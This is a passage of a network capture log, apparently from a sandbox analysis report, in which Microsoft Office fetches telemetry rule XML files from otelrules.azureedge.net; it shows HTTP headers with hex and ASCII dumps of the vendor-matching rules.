                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      4192.168.2.94970813.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:50 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 450
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 67a0dec0-201e-006e-29f9-2abbe3000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131150Z-15b8d89586fst84kttks1s2css000000035g00000000bnr7
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      5192.168.2.94971013.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:50 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 2160
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: fc6998d3-101e-008d-52ad-2692e5000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131150Z-16849878b787bfsh7zgp804my400000008bg00000000bb7r
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      6192.168.2.94971213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:51 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 7b93b929-d01e-0082-6676-27e489000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131151Z-16849878b78qwx7pmw9x5fub1c00000007s00000000083a1
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      7192.168.2.94971313.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:51 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 045b826b-001e-0014-04b7-2a5151000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131151Z-159b85dff8fprglthC1DFW8zcg00000001eg000000003mvu
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      8192.168.2.94971413.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:51 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 4755be7f-e01e-0052-062b-26d9df000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131151Z-16849878b786lft2mu9uftf3y40000000aqg00000000mw3a
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      9192.168.2.94971913.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:51 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 467
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 0d0c59f1-101e-005a-526a-27882b000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131151Z-17c5cb586f64sw5wh0dfzbdtvw00000001vg000000000ns9
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      10192.168.2.94971513.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:51 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 632
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 8abc48b9-201e-0096-2f4f-28ace6000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131151Z-15b8d89586fhl2qtatrz3vfkf00000000g1g0000000004e0
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:51 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      11192.168.2.94972213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:52 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 1ae852e8-d01e-008e-29f5-24387a000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131152Z-15b8d89586flspj6y6m5fk442w0000000fkg000000006f98
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
